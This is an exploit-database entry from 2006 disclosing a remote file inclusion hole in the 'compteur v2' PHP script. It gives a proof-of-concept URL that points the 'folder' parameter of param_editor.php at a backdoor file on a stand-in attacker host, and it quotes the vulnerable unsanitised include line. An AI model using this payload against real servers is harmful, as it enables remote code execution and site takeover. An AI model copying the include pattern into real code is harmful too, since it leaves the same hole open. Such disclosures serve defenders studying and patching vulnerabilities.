compteur v2 (param_editor.php) Remote File Include Vulnerability

2006-10-10T00:00:00
ID 1337DAY-ID-947
Type zdt
Reporter DarkFig
Modified 2006-10-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
compteur v2 (param_editor.php) Remote File Include Vulnerability 
================================================================


#
# Title..: 7 php scripts File Inclusion Vuln / Source disclosure
# Credits: DarkFig
#
# Using http://www.google.com/codesearch
# Few examples about what we can do with a code search engine
# For educational purpose only.
#
# You can use regex in your research, this can be chaotic.
# What's your opinion about the google code search project ?
#

# Affected.scr: compteur_v2
# Poc.........: http://victim.xx/param_editor.php?folder=http://hack.c/backd.txt?
# Vuln.code...: Line 9 , include($_GET["folder"]."param.php")



#  0day.today [2018-04-13]  #